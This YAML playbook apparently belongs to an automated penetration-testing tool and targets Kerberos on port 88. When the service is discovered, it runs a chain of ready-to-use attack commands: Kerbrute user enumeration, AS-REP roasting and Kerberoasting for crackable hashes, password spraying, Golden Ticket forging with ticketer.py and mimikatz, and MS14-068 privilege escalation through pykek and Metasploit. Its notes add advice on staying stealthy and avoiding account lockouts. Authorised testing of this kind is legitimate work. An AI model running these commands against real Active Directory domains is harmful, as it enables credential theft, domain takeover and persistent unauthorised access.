id: kerberos_pentesting
name: Kerberos Penetration Testing (Port 88)
description: Comprehensive Kerberos authentication enumeration, user brute forcing, and ticket-based attacks based on HackTricks methodology
category: enumeration
risk_level: critical
batch_compatible: true

triggers:
  - id: trigger_kerberos_service
    type: asset_discovered
    asset_type: service
    required_properties:
      port: { "$in": [88] }
      protocol: { "$in": ["kerberos", "tcp", "udp"] }
    required_count: 1
    priority: 8
    description: Triggers when Kerberos service is discovered
    deduplication:
      enabled: true
      strategy: signature_based
      signature_fields: ["host", "port"]

steps:
  - id: kerberos_enumeration
    name: Kerberos Service Enumeration
    description: Identify Kerberos realm and server information
    order: 1
    timeout_seconds: 60
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='{domain}' {host}"
        preferred: true
        notes: "Enumerate Kerberos users without credentials"
        requires_elevation: false
      - tool: netexec
        platforms: [linux, macos, windows]
        command: "netexec smb {host} -u '' -p '' --gen-relay-list kerberos_targets.txt"
        preferred: false
        notes: "Generate Kerberos target list for later attacks"
        requires_elevation: false

  - id: kerberos_time_sync
    name: Kerberos Time Synchronization Check
    description: Verify time synchronization (critical for Kerberos auth)
    order: 2
    timeout_seconds: 30
    commands:
      - tool: ntpdate
        platforms: [linux, macos]
        command: "sudo ntpdate -q {host}"
        preferred: true
        notes: "Check time difference (>5min will cause KRB_AP_ERR_SKEW)"
        requires_elevation: true
      - tool: chronyd
        platforms: [linux]
        command: "sudo chronyd -q 'server {host} iburst'"
        preferred: false
        notes: "Alternative time sync check with chronyd"
        requires_elevation: true

  - id: kerberos_user_enumeration
    name: Kerberos User Enumeration
    description: Enumerate valid Active Directory usernames via Kerberos
    order: 3
    timeout_seconds: 300
    commands:
      - tool: kerbrute
        platforms: [linux, macos, windows]
        command: "kerbrute userenum -d {domain} --dc {host} /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt"
        preferred: true
        notes: "Kerberos user enumeration without triggering account lockout"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='{domain}',userdb=/usr/share/wordlists/usernames.txt {host}"
        preferred: false
        notes: "Nmap Kerberos user enumeration"
        requires_elevation: false

  - id: kerberos_asreproast
    name: Kerberos AS-REP Roasting
    description: Request AS-REP for users without Kerberos pre-authentication
    order: 4
    timeout_seconds: 180
    commands:
      - tool: impacket
        platforms: [linux, macos, windows]
        command: "GetNPUsers.py {domain}/ -usersfile valid_users.txt -format hashcat -outputfile asrep_hashes.txt -dc-ip {host}"
        preferred: true
        notes: "AS-REP roasting to obtain crackable hashes"
        requires_elevation: false
      - tool: rubeus
        platforms: [windows]
        command: "Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt"
        preferred: false
        notes: "Windows-native AS-REP roasting with Rubeus"
        requires_elevation: false

  - id: kerberos_password_spray
    name: Kerberos Password Spraying
    description: Password spraying attack against Kerberos (careful with lockout)
    order: 5
    timeout_seconds: 600
    commands:
      - tool: kerbrute
        platforms: [linux, macos, windows]
        command: "kerbrute passwordspray -d {domain} --dc {host} valid_users.txt 'Password123'"
        preferred: true
        notes: "Password spraying (check lockout policy first!)"
        requires_elevation: false
      - tool: crackmapexec
        platforms: [linux, macos, windows]
        command: "crackmapexec smb {host} -u valid_users.txt -p 'Password123' --continue-on-success"
        preferred: false
        notes: "Password spraying via SMB (uses Kerberos if available)"
        requires_elevation: false

  - id: kerberoasting
    name: Kerberoasting (Service Principal Names)
    description: Request TGS tickets for service accounts with weak passwords
    order: 6
    timeout_seconds: 300
    commands:
      - tool: impacket
        platforms: [linux, macos, windows]
        command: "GetUserSPNs.py {domain}/{username}:{password} -dc-ip {host} -request -outputfile kerberoast_hashes.txt"
        preferred: true
        notes: "Kerberoasting to obtain crackable service account hashes"
        requires_elevation: false
      - tool: rubeus
        platforms: [windows]
        command: "Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt /domain:{domain}"
        preferred: false
        notes: "Windows-native Kerberoasting with Rubeus"
        requires_elevation: false

  - id: kerberos_ticket_attacks
    name: Kerberos Ticket Manipulation (Golden/Silver Tickets)
    description: Advanced ticket attacks (requires domain admin or krbtgt hash)
    order: 7
    timeout_seconds: 180
    commands:
      - tool: impacket
        platforms: [linux, macos, windows]
        command: "ticketer.py -nthash {krbtgt_hash} -domain-sid {domain_sid} -domain {domain} Administrator"
        preferred: true
        notes: "Create Golden Ticket (requires krbtgt NTLM hash)"
        requires_elevation: false
      - tool: mimikatz
        platforms: [windows]
        command: "mimikatz.exe 'kerberos::golden /domain:{domain} /sid:{domain_sid} /rc4:{krbtgt_hash} /user:Administrator /ptt' exit"
        preferred: false
        notes: "Create and inject Golden Ticket with Mimikatz"
        requires_elevation: true

  - id: ms14_068_exploit
    name: MS14-068 Kerberos Privilege Escalation
    description: Exploit MS14-068 to escalate to Domain Admin (unpatched systems)
    order: 8
    timeout_seconds: 120
    commands:
      - tool: pykek
        platforms: [linux, macos, windows]
        command: "python ms14-068.py -u {username}@{domain} -s {user_sid} -d {host} -p {password}"
        preferred: true
        notes: "Exploit MS14-068 to forge elevated TGT"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/admin/kerberos/ms14_068_kerberos_checksum; set RHOST {host}; set USER {username}; set PASSWORD {password}; run; exit'"
        preferred: false
        notes: "Metasploit MS14-068 exploitation"
        requires_elevation: false

metadata:
  tools:
    - kerbrute
    - impacket
    - nmap
    - rubeus
    - mimikatz
    - crackmapexec
    - pykek
    - netexec
  cves:
    - CVE-2014-6324  # MS14-068 Kerberos privilege escalation
  references:
    - https://book.hacktricks.xyz/network-services-pentesting/pentesting-kerberos-88
    - https://github.com/ropnop/kerbrute
    - https://github.com/GhostPack/Rubeus
    - https://adsecurity.org/?p=541
  techniques:
    - User enumeration via Kerberos
    - AS-REP roasting (users without pre-auth)
    - Kerberoasting (service account tickets)
    - Password spraying
    - Golden ticket attacks (krbtgt hash)
    - Silver ticket attacks (service hash)
    - MS14-068 privilege escalation
    - Time synchronization attacks
  batch_commands:
    user_enum: "kerbrute userenum -d {domain} --dc {host} /usr/share/wordlists/usernames.txt -o kerbrute_users.txt"
    asreproast: "GetNPUsers.py {domain}/ -usersfile users.txt -format hashcat -outputfile asrep.txt -dc-ip {host}"
    kerberoast: "GetUserSPNs.py {domain}/{user}:{pass} -dc-ip {host} -request -outputfile kerberoast.txt"
  notes: |
    Kerberos (port 88) is the primary authentication protocol in Active Directory.

    CRITICAL REQUIREMENTS:
    - Time synchronization within 5 minutes (use ntpdate/chronyd)
    - Valid krb5.conf configuration for the target realm
    - FQDN resolution (not IP addresses for SPNs)

    COMMON ATTACKS:
    - User enumeration: Kerbrute is stealthy and doesn't cause lockouts
    - AS-REP roasting: Users with "Do not require Kerberos preauthentication"
    - Kerberoasting: Service accounts with weak passwords
    - Password spraying: Test common passwords (watch for lockout policies!)
    - Golden tickets: Requires krbtgt NTLM hash (domain persistence)
    - Silver tickets: Requires service account hash (service-level access)

    MS14-068 VULNERABILITY:
    - Allows low-privilege user to forge Domain Admin TGT
    - Only works on unpatched Windows Server 2003-2012 R2
    - One of the most critical AD vulnerabilities ever discovered

    AUTHENTICATION METHODS:
    - Password authentication (kinit)
    - Pass-the-hash (NTLM hash via Impacket/Rubeus)
    - Pass-the-ticket (TGT/TGS injection)

    LOCKOUT AVOIDANCE:
    - Use kerbrute for user enum (doesn't trigger lockout)
    - Check domain password policy before spraying
    - Use delay between password attempts
    - Monitor failed login counts during testing
